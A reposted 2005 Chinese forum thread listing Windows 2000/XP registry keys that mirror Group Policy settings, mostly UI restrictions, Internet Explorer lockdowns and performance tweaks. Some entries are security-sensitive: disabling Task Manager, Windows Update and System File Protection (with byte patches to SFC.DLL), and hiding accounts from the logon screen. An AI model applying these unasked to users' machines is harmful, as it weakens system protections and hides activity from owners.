黄盈盈 中国人民大学:注册表键值列表_srxljl吧_贴吧

来源:百度文库 编辑:偶看新闻 时间:2024/04/28 02:27:04
精华注册表

WINDOWS 2000及以后版本新增注册表设置

WINDOWS 2000及以后版本新增注册表设置

《组策略\用户配置\管理模板\Windows组件\Windows资源管理器》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoManageMyComputerVerb"=dword:00000001(隐藏"我的电脑"右键菜单的"管理")(至少WIN2000)
"NoShellSearchButton"=dword:00000001(从资源管理器中删除"搜索"按钮)(至少WIN2000)
"NoLowDiskSpaceChecks"=dword:00000001(禁止硬盘空间不足的警告)(至少WIN2000)
"NoViewOnDrive"=dword:xxxxxxxx(禁止从我的电脑访问驱动器,设置参照"NoDrives")(至少WIN2000)
"NoHardwareTab"=dword:00000001(从控制面板的鼠标,键盘、声音和音频设备以及驱动器的属性对话框中删除硬件选项卡)(至少WIN2000)
"NoSecurityTab"=dword:00000001(从文件及文件夹属性中删除安全选项卡)(至少WINXP)
"NoChangeAnimation"=dword:00000001(禁止更改菜单动画设置的UI)(至少WIN2000)
"NoChangeKeyboardNavigationIndicators"=dword:00000001(禁止更改显示属性中"使用ALT键之前始终隐藏键盘导航指示"选项)(至少WIN2000)
"NoDFSTab"=dword:00000001(从资源管理器中删除DFS选项卡)(至少WIN2000)
"NoComputersNearMe"=dword:00000001(网上邻居中没有"我附近的计算机")(至少WIN2000)
"MaxRecentDocs"=dword:0000000f(最近的文档最大数目)(至少WIN2000)
"NoRunasInstallPrompt"=dword:00000001(禁止使用"作为其他用户安装程序"对话框来安装程序)(至少WIN2000)
"PromptRunasInstallNetPath"=dword:00000001(在网络安装时显示"作为其他用户安装程序"对话框)(至少WIN2000)
[注]只有当非管理员用户安装程序时,才需要提交其它登录凭据(作为其他用户安装程序)。
"NoCDBurning"=dword:00000001(删除资源管理器的CD烧录功能)(至少WINXP)
"NoRecycleFiles"=dword:00000001(不将删除的文件移入回收站)(至少WINXP)
"ConfirmFileDelete"=dword:00000001(强制确认文件删除对话框)(至少WINXP)
"RecycleBinSize"=dword:0000000a(限制回收站占磁盘空间的百分比,禁止用户更改)(至少WINXP)
"NoSharedDocuments"=dword:00000001(从我的电脑删除共享文档)(至少WINXP)
"NoThumbnailCache"=dword:00000001(关闭缩略图缓存)(至少WINXP)
"NoFileAssociate"=dword:00000001(禁止更改文件夹选项中的文件类型)(至少WIN2000)

《组策略\用户配置\管理模板\Windows组件\Windows资源管理器\通用打开文件对话框》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32\Placesbar]
"Place0"="ab"(位置栏中显示的项目)(至少WINXP)
[注]一共设置5个值,从Place0到Place4,有效项目为:
1.本地文件夹,如C:\Windows
2.远程文件夹,格式\\server\share
3.Common Shell Folders:CommonDocuments,CommonMusic,CommonPictures,Desktop,MyComputer, MyDocuments,MyFavorites,MyMusic,MyNetworkPlaces,MyPictures,Printers, ProgramFiles,Recent。
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32]
"NoPlacesBar"=dword:00000001(隐藏位置栏)(至少WIN2000)
"NoFileMru"=dword:00000001(隐藏最近访问过文件的列表)(至少WIN2000)

《组策略\用户配置\管理模板\Windows组件\Micorsoft Management Console》
[HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC]
"RestrictAuthorMode"=dword:00000001(禁止用户进入编辑模式)(至少WIN2000)
"RestrictToPermittedSnapins"=dword:00000001(限制用户只使用列表中特别允许的管理单元)(至少WIN2000)

  • 2005-8-27 10:49
  • 回复
  • srxljl
  • 9位粉丝

2楼

[HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\]
"Restrict_Run"=dword:00000000(允许)/00000001(禁止)(允许或禁止使用管理单元)(至少WIN2000)
[注]一些管理单元的CLSID:
{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}(组策略)
{58221C67-EA27-11CF-ADCF-00AA00A80033}(计算机管理)
{90087284-d6d6-11d0-8353-00a0c90640bf}(设备管理器)
{8EAD3A12-B2C1-11d0-83AA-00A0C92C9D5D}(磁盘管理)
{975797FC-4E2A-11D0-B702-00C04FD8DBF7}(事件查看器)
{5D6179C8-17EC-11D1-9AA9-00C04FD8FE93}(本地用户和组)
{58221C66-EA27-11CF-ADCF-00AA00A80033}(服务)
{45ac8c63-23e2-11d1-a696-00c04fd58bc3}(系统信息)

《组策略\用户配置\管理模板\Windows组件\Windows Update》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate]
"DisableWindowsUpdateAccess"=dword:00000001(删除使用所有Windows Update功能的访问)(至少WINXP)

《组策略\用户配置\管理模板\任务栏和开始菜单》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSimpleStartMenu"=dword:00000001(强制典型菜单)(至少WINXP)
"NoCommonGroups"=dword:00000001(从开始->程序菜单删除公共程序组)(至少WIN2000)
"NoSMMyDocs"=dword:00000001(从开始->文档菜单删除我的文档图标)(至少WIN2000)
"NoNetworkConnections"=dword:00000001(从开始->设置菜单删除网络连接)(至少WIN2000)
"NoSMMyPictures"=dword:00000001(从开始菜单中删除"图片收藏"图标)(至少WINXP)
"ForceStartMenuLogOff"=dword:00000001(强制开始菜单显示注销)(至少WIN2000)
"Intellimenus"=dword:00000001(禁止个性化菜单)(至少WIN2000)
"NoInstrumentation"=dword:00000001(关闭用户跟踪)(至少WIN2000)
[注]这个设置防止系统跟踪用户使用的程序、用户导航的路径和用户打开的文档。系统用这个信息来自定义Windows功能,如个性化菜单。
"MemCheckBoxInRunDlg"=dword:00000001(将"在单独的内存空间运行"复选框添加到"运行"对话框)(至少WIN2000)
[注]允许用户在专用的(不是共享的)虚拟DOS机器(VDM)进程中运行十六位程序。
"NoTaskGrouping"=dword:00000001(阻止在任务栏上对项目分组)(至少WINXP)
"LockTaskbar"=dword:00000001(锁定任务栏)(至少WINXP)
"NoTrayItemsDisplay"=dword:00000001(隐藏系统托盘图标)(至少WINXP)
"NoToolbarsOnTaskbar"=dword:00000001(不在任务栏显示任何自定义工具栏)(至少WINXP)
"GreyMSIAds""=dword:00000001(灰色显示开始菜单中安装不完全的程序的快捷方式)(至少WIN2000)

《组策略\用户配置\管理模板\任务栏和开始菜单(WINXP新样式开始菜单)》
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoUserNameInStartMenu"=dword:00000001(隐藏用户名)
"NoStartMenuMorePrograms"=dword:00000001(隐藏所有程序)
"NoStartMenuMFUprogramsList"=dword:00000001(隐藏经常使用的程序)
"NoStartMenuMyMusic"=dword:00000001(删除我的音乐图标)
"NoStartMenuNetworkPlaces"=dword:00000001(删除网上邻居图标)

《组策略\用户配置\管理模板\桌面》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum]
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=dword:00000001(删除所有我的电脑图标)(至少WINXP)
"{450D8FBA-AD25-11D0-98A8-0800361B1103}"=dword:00000001(删除所有我的文档图标)(至少WIN2000)
"{645FF040-5081-101B-9F08-00AA002F954E}"=dword:00000001(删除所有回收站图标)(至少WINXP)

  • 2005-8-27 10:49
  • 回复
  • srxljl
  • 9位粉丝

3楼

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoPropertiesMyComputer"=dword:00000001(删除我的电脑右键菜单的属性)(至少WIN2000SP3)
"NoPropertiesMyDocuments"=dword:00000001(删除我的文档右键菜单的属性)(至少WIN2000SP3)
"NoPropertiesRecycleBin"=dword:00000001(删除回收站右键菜单的属性)(至少WINXP)
"NoRecentDocsNetHood"=dword:00000001(不将打开的共享文件夹添加到网上邻居)(至少WIN2000)
"DisablePersonalDirChange"=dword:00000001(禁止更改我的文档路径)(至少WIN2000)
"NoDesktopCleanupWizard"=dword:00000001(删除桌面清理向导)(至少WINXP)

《组策略\用户配置\管理模板\桌面\活动桌面》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"ForceActiveDesktopOn"=dword:00000001(启用活动桌面,禁止用户关闭)(至少WIN2000)
[注]此设置的优先级比"NoActiveDesktop"要高。
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"Wallpaper"="ab"(指定桌面墙纸的位置,禁止用户更改)(至少WIN2000/ME)
"WallpaperStyle"="0"(0:居中,1:平铺,2:拉伸)(至少WIN2000/ME)

《组策略\用户配置\管理模板\控制面板》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoControlPanel"=dword:00000001(禁止访问控制面板)(至少WIN2000)
"ForceClassicControlPanel"=dword:00000001(强制为传统控制面板样式)(至少WINXP)
"DisallowCpl"=dword:00000001(隐藏指定的控制面板项目)(至少WIN2000)
"RestrictCpl"=dword:00000001(只显示指定的控制面板项目)(至少WIN2000)
[注]以上两项设置需要添加相同名称的子键,然后在子键里面新建字符串,将其值设置为指定的控制面板项目,如desk.cpl、powercfg.cpl等,可以在%WinDir%\System32目录中查找cpl文件。

《组策略\用户配置\管理模板\控制面板\添加/删除程序》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall]
"NoAddRemovePrograms"=dword:00000001(禁用添加/删除程序)(至少WIN2000)
"NoRemovePage"=dword:00000001(隐藏更改或删除程序页面)(至少WIN2000)
"NoAddPage"=dword:00000001(隐藏添加新程序页面)(至少WIN2000)
"NoWindowsSetupPage"=dword:00000001(隐藏添加/删除Windows组件页面)(至少WIN2000)
"NoAddFromCDorFloppy"=dword:00000001(隐藏从CD-ROM或软盘添加程序选项)(至少WIN2000)
"NoAddFromInternet"=dword:00000001(隐藏从Microsoft添加程序选项)(至少WIN2000)
"NoAddFromNetwork"=dword:00000001(隐藏从网络中添加程序选项)(至少WIN2000)
"NoServices"=dword:00000001(直接打开"组件向导",防止用户使用"添加/删除程序"来配置已安装的服务)(至少WIN2000)
"NoSupportInfo"=dword:00000001(从"更改或删除程序"页面上的程序删除通向"支持信息"对话框的链接)(至少WIN2000)

《组策略\用户配置\管理模板\控制面板\显示》
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel\Desktop]
"ScreenSaveActive"="0"(禁用屏幕保护程序)(至少WIN2000SP1)
"SCRNSAVE.EXE"="ab"(指定屏幕保护程序文件,将不能通过显示控制面板更改)(至少WIN2000SP1)
"ScreenSaverIsSecure"="0"(禁用)/"1"(启用)(密码保护屏幕保护程序)(至少WIN2000SP1)
"ScreenSaveTimeOut"="900"(指定等待时间,单位秒,范围1-86400,如设为0则不启动,此设置将不能通过显示控制面板更改)(至少WIN2000SP1)

《组策略\用户配置\管理模板\控制面板\显示\桌面主题》

  • 2005-8-27 10:49
  • 回复
  • srxljl
  • 9位粉丝

4楼

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoThemesTab"=dword:00000001(删除显示属性的主题选项)(至少WINXP)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"NoVisualStyleChoice"=dword:00000001(禁止选择外观下的窗口和按钮样式)(至少WINXP)
"NoColorChoice"=dword:00000001(禁止选择外观下的色彩方案)(至少WINXP)
"NoSizeChoice"=dword:00000001(禁止选择外观下的字体大小)(至少WINXP)
"SetVisualStyle"="ab"(加载一个视觉样式文件,如数据为空则强制使用Windows经典)(至少WINXP)

《组策略\用户配置\管理模板\系统》
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"DisableCMD"=dword:00000002(禁用命令提示符及.cmd和.bat文件)(至少WIN2000)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"Shell"="ab"(自定义用户界面,ab代表界面程序文件名)(至少WIN2000)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoAutoUpdate"=dword:00000001(禁用Windows自动更新)(至少WINXP)

《组策略\用户配置\管理模板\系统:只运行许可的Windows应用程序》(所有WINDOWS)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"RestrictRun"=dword:00000001(禁止运行所有程序)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun]
[操作]新建字符串值,名称可以任意,串值为能运行的应用程序,保证"regedit.exe"包含在列表中。

《组策略\用户配置\管理模板\系统:不运行指定的Windows应用程序》(至少WIN2000/ME)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"DisallowRun"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun]
[操作]新建字符串值,从"1"开始命名,串值为不运行的应用程序。

《组策略\用户配置\管理模板\系统\Ctrl+Alt+Del选项》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001(禁止用户运行任务管理器)(至少WIN2000)
"DisableLockWorkstation"=dword:00000001(禁止用户锁定计算机)(至少WIN2000)
"DisableChangePassword"=dword:00000001(禁止用户改变密码)(至少WIN2000)

《组策略\用户配置\管理模板\系统\登录/注销》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"DisableLocalMachineRun"=dword:00000001(禁用计算机运行列表)(至少WIN2000)
"DisableLocalMachineRunOnce"=dword:00000001(禁用计算机运行一次列表)(至少WIN2000)
"DisableCurrentUserRun"=dword:00000001(禁用用户运行列表)(至少WIN2000)
"DisableCurrentUserRunOnce"=dword:00000001(禁用用户运行一次列表)(至少WIN2000)
[注]各运行列表所在的注册表位置:
计算机运行列表[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
计算机运行一次列表[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
用户运行列表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
用户运行一次列表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

《组策略\用户配置\管理模板\系统\登录/注销:限制配置文件大小》(至少WIN2000)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

  • 2005-8-27 10:49
  • 回复
  • srxljl
  • 9位粉丝

5楼

"EnableProfileQuota"=dword:00000001(限制漫游用户配置文件的大小)
"MaxProfileSize"=dword:00007530(Windows默认,漫游用户配置文件的最大值,单位KB)
"IncludeRegInProQuota"=dword:00000001(文件列表中包含注册表)
"WarnUser"=dword:00000001(超出容量限制时通知用户)
"ProfileQuotaMessage"="ab"(超出容量限制时通知用户的提示信息)
"WarnUserTimeout"=dword:0000000f(Windows默认,提醒用户间隔时间,单位:分钟)

《组策略\用户配置\管理模板\系统\电源管理》
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Power]
"PromptPasswordOnResume"=dword:00000001(从休眠/挂起恢复时提示输入密码)(至少WINXP)

《组策略\计算机配置\Windows设置\安全设置\本地策略\安全选项》
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=dword:00000001(不显示上次登陆的用户名)(至少WIN2000)
"shutdownwithoutlogon"=dword:00000001(允许在未登录前关机)(WINNT/2000/XP)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001(关机时清理虚拟内存页面文件)(WINNT/2000/XP)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000001(不允许SAM帐户和共享的匿名枚举)(WINNT/2000/XP)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters]
"DisablePasswordChange"=dword:00000001(禁止更改机器帐户密码)(至少WIN2000)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers\LanMan Print Services\servers]
"addprinterdrivers"=dword:00000001(防止用户安装打印机驱动程序)(至少WIN2000)

《组策略\计算机配置\管理模板\系统》
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoEncryptOnMove"=dword:00000001(不自动加密移动到加密文件夹中的文件)
[注]这个策略只适用于在一个卷中移动的文件。文件被移到其它文件夹,或在加密文件夹中创建了一个新文件,Windows 资源管理器会自动加密那些文件。

《组策略\计算机配置\管理模板\系统\登录》
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"LogonType"=dword:00000000(总是用传统登录)(至少WINXP)

《组策略\计算机配置\管理模板\系统\组策略》
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"DisableBkGndGroupPolicy"=dword:00000001(关闭组策略的后台刷新)(至少WIN2000)

《组策略\计算机配置\管理模板\系统\Windows文件保护》
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Windows File Protection]
"SfcQuota"=dword:00000032(Windows文件保护缓存的最大值,单位MB)(至少WINXP)
"SFCDllCacheDir"="ab"(Windows文件保护缓存的位置)(至少WINXP)
《清理文件右键菜单"打开方式"列表》(WIN2000/ME/XP)
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes]
[操作]在要清理的文件类型对应的子键下,删除OpenWithList子键中相关子键。
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts]
[操作]在要清理的文件类型对应的子键下,删除OpenWithList和OpenWithProgids子键中相关键值。
[注]以上三项,只要有一项定义,就会在打开方式列表中显示。

《把桌面"我的电脑"放在"我的文档"之上》(WIN2000/ME/XP)
[HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}]

  • 2005-8-27 10:49
  • 回复
  • srxljl
  • 9位粉丝

6楼

"SortOrderIndex"=dword:00000054(默认值:48)

《在桌面上显示Windows版本号》(WIN2000/XP)
[HKEY_CURRENT_USER\Control Panel\Desktop]
"PaintDesktopVersion"=dword:00000001

《取消WINXP对图片文件的强制关联》
[HKEY_CLASSES_ROOT\SystemFileAssociations\image\ShellEx\ContextMenuHandlers\ShellImagePreview]
[操作]删除"默认"键值的数据:{e84fda7c-1d6a-45f6-b725-cb260c236066}。
[注]也可以通过命令行来禁止图片预览功能:regsvr32 /u zipfldr.dll。

《改变缩略图的大小和质量》(WIMXP)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ThumbnailSize"=dword:xxxxxxxx(大小,取值范围为十进制32-256)
"ThumbnailQuality"=dword:xxxxxxxx(质量,取值范围为十进制50-100)

《禁止生成缩略图缓冲文件Thumbs.db》(WIMXP)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"DisableThumbnailCache"=dword:00000001

《WINXP使用WIN2000的搜索界面》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState] 
"Use Search Asst"="no"(no禁止搜索代理,yes允许搜索代理) 

《用户操作历史记录》(WIN2000/XP)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU](程序最近运行的历史记录)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU](打开与保存的文件历史记录)

《Windows保存上次最后打开的注册表键的位置》(WIN2000/XP)
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Applets/Regedit]
"LastKey"="ab"(ab为注册表键名)
[注] 如将此子键的权限设为当前用户拒绝访问,则regedit不会保留上次打开的键(记忆功能),但同时也禁用了收藏夹功能。可以先在 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets]下新建一个Favorites子键,然后再按上例方法将Regedit项的权限设为拒绝,这样既可禁止注册表编辑器的记忆功能,又不会影响收藏夹的使用。

《注册表编辑器收藏夹的存放位置》(WIN2000/XP)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit\Favorites]

《在"服务"中删除不需要的服务》(WIN2000/XP)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services]
[操作]删除相关子键,重新启动生效。

《自定义WINXP的时间服务》
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\Servers]
"3"="ab"(增加时间校正服务器,可以增加多个,ab表示服务器网址)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient]
"SpecialPollInterval"=dword:xxxxxxxx(同步时间间隔。单位:秒,默认为十进制604800,即一周)

《自定义数字(Num Lock)键状态》(WIN2000/XP)
[HKEY_CURRENT_USER\Control Panel\Keyboard]
"InitialKeyboardIndicators"="2"(打开)/"0"(关闭)

《在登录WINXP的欢迎屏幕上隐藏某些用户》
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
[操作]新建DWORD值,名称为需要隐藏的用户名,把值设为0即可隐藏该用户。
[注]可以通过此方法显示Administrator帐户,对应的DWORD值为1。

《禁用登录对话框中选项按钮》(WINNT/2000/XP)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShowLogonOptions"=dword:00000000

《不使用AUTOEXEC.BAT中的环境变量》(WINNT/2000/XP)

  • 2005-8-27 10:49
  • 回复
  • srxljl
  • 9位粉丝

7楼

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec"="0"

《保留复制和移动的文件原来的NTFS权限》(WINNT/2000/XP)
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"ForceCopyAclwithFile"=dword:00000001
[注]默认情况下,当复制或移动文件或文件夹到另一个文件夹时,它会继承新文件夹的权限。

《禁止EFS加密功能》(WIN2000/XP)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\EFS]
"EfsConfiguration"=dword:00000001
[注] 如果不想完全禁止Windows XP的文件加密功能,但希望特定的文件夹能够不被加密,可以在此文件夹中新建一个文本文件,命名为Desktop.ini,内容包括" [Encryption]"和"Disable=1"两行。这样,当其他用户试图加密该文件夹时系统将提示用户该文件夹的加密功能被禁止。使用这种方法您只能禁止用户加密该文件夹,文件夹中的子文件夹将不受保护。

《让"设备管理器"显示更多信息》(WIN2000/XP)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]
"DEVMGR_SHOW_DETAILS"="1"(显示更多设备信息)
"DEVMGR_SHOW_NONPRESENT_DEVICES"="1"(显示隐藏设备)
[注]隐藏设备就是以前安装过但现已被拔走的设备。

《查看系统硬件信息》(WIN2000/XP)
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System](查看主板BIOS信息)
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0](查看CPU信息)

《加快关机速度》(WIN2000/XP)
[HKEY_CURRENT_USER\Control Panel\Desktop]
"AutoEndTasks"="1"(自动关闭停止响应的程序)
"HungAppTimeout"="200"(程序出错时等待时间,单位:毫秒,默认值5000)
"WaitToKillAppTimeout"="1000"(关闭程序时等待时间,单位:毫秒,默认值20000)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"(关闭服务时等待时间,单位:毫秒,默认值20000)

《减少WINXP开机滚动条时间》
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters]
"EnablePrefetcher"=dword:00000001

《提升系统内核的性能》(WINNT/2000/XP)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"DisablePagingExecutive"=dword:00000001
[注]默认情况下,Windows会把系统内核写入硬盘,这个设置就是通过禁用内存页面调度(Paging Executive),让数据保留在内存中,从而提升系统性能。建议拥有很多内存的用户(256M以上)使用这个设置。

《提升系统缓存》
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"LargeSystemCache"=dword:00000001
[注]通常来说,该优化会使系统性能得到相当的提升,但也有可能会使某些应用程序性能降低。需要注意的是必须有256M以上的内存,激活LargeSystemCache才能起到正面作用。

《修改CPU二级缓存》(WINNT/2000/XP)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"SecondLevelDataCache"=dword:xxxxxxxx(单位:KB)

《增加磁盘缓存》(WINNT/2000/XP)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"IoPageLockLimit"=dword:xxxxxxxx(单位:KB)
[注]不同内存取不同的数值,64M:00001000;128M:00004000;256M:00010000;512M或更大:00040000。据说此法可以降低BT下载对硬盘的伤害。

《关闭文件保护(SFC)》(WIN2000/XP)
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]

  • 2005-8-27 10:49
  • 回复
  • srxljl
  • 9位粉丝

8楼

"SFCDisable"=dword:ffffff9d(彻底关闭。1为关闭但下次提示开启,2为仅下次启动时关闭,4为开启但提示关闭)
[注] 若要使设置在WIN2000SP2及WINXP有效,必须分别修改SFC.DLL和SFC_OS.DLL文件。对于WIN2000SP2,修改 SFC.DLL中6211h的值"8B C6"为"90 90";对于WINXP,修改SFC_OS.DLL中E2B8h的值"8B C6""为"90 90";对于WINXPSP1,修改SFC_OS.DLL中E3BBh的值"8B C6""为"90 90"。

《WINXPSP2多用户同时登录》
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Licensing Core]
"EnableConcurrentSessions"=dword:00000001
[注]这样的并发连接最多支持两个用户同时登录一个系统,并且不能使用相同的帐号。利用该功能,在本地电脑使用Windows XP的同时,可允许另外一个用户通过远程桌面进入系统同时使用Windows XP,而不必在远程桌面登录时让本地用户退出。

《程序出错时系统自动重新启动外壳程序》(WIN2000/XP)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoRestartShell"=dword:00000001(默认值)

《解决无法实现软关机的故障》(WINNT/2000/XP)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"PowerdownAfterShutdown"="1"

《解决汉字乱码现象》(WIN2000/XP)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FontAssoc]
[操作]可能是注册表中与字体相关的数据出错所致,简便方法是:在另一台正常显示的计算机中将上面的内容导出到一个reg文件中,然后将该文件拷贝导出现乱码的计算机中,双击该文件将其导入注册表即可。

注册表网络设置

《"Internet选项"控制面板》
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"GeneralTab"=dword:00000001(禁用常规页面)
"SecurityTab"=dword:00000001(禁用安全页面)
"PrivacyTab"=dword:00000001(禁用隐私页面)
"ContentTab"=dword:00000001(禁用内容页面)
"ConnectionsTab"=dword:00000001(禁用连接页面)
"ProgramsTab"=dword:00000001(禁用程序页面)
"AdvancedTab"=dword:00000001(禁用高级页面)
"HomePage"=dword:00000001(禁止更改主页设置)
"Cache"=dword:00000001(禁止更改Internet临时文件设置)
"History"=dword:00000001(禁止更改历史记录设置)
"Colors"=dword:00000001(禁止更改颜色设置)
"links"=dword:00000001(禁止更改链接颜色设置)
"Fonts"=dword:00000001(禁止更改字体设置)
"Languages"=dword:00000001(禁止更改语言设置)
"Accessibility"=dword:00000001(禁止更改辅助功能设置)
"Ratings"=dword:00000001(禁止更改分级设置)
"Certificates"=dword:00000001(禁止更改证书设置)
"FormSuggest"=dword:00000001(禁用表单的自动完成)
"FormSuggest Passwords"=dword:00000001(禁止自动完成功能保存密码)
"Profiles"=dword:00000001(禁止更改配置文件助理设置)
"Connwiz Admin Lock"=dword:00000001(禁用Internet连接向导)
"Connection Settings"=dword:00000001(禁止更改连接设置)
"Autoconfig"=dword:00000001(禁止更改局域网设置中的自动配置设置)
"Proxy"=dword:00000001(禁止更改局域网设置中的代理服务器设置)
"Messaging"=dword:00000001(禁止更改电子邮件、新闻组和Internet呼叫设置)
"CalendarContact"=dword:00000001(禁止更改日历和联系人的设置)
"ResetWebSettings"=dword:00000001(禁用重置Web设置)
"Check_If_Default"=dword:00000001(禁止更改默认浏览器检查)
"Advanced"=dword:00000001(禁止更改高级页面的设置)

《Internet Explorer》
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]

  • 2005-8-27 10:49
  • 回复
  • srxljl
  • 9位粉丝

9楼

"NoBrowserContextMenu"=dword:00000001(禁用鼠标右键菜单)
"NoOpeninNewWnd"=dword:00000001(禁用"在新窗口中打开"菜单项)
"NoSelectDownloadDir"=dword:00000001(禁用"目标另存为"及"将该程序保存到磁盘"选项)
[注]以下设置仅对IE浏览器有效,而对IE核心的其它浏览器无效。
"NoFavorites"=dword:00000001(隐藏收藏夹)
"NoFileNew"=dword:00000001(禁用"文件"菜单的"新建"菜单项目)
"NoFileOpen"=dword:00000001(禁用"文件"菜单的"打开"菜单项)
"NoBrowserSaveAs"=dword:00000001(禁用"文件"菜单的"另存为"菜单项)
"NoBrowserClose"=dword:00000001(禁用"文件"菜单的关闭浏览器和资源管理器窗口)
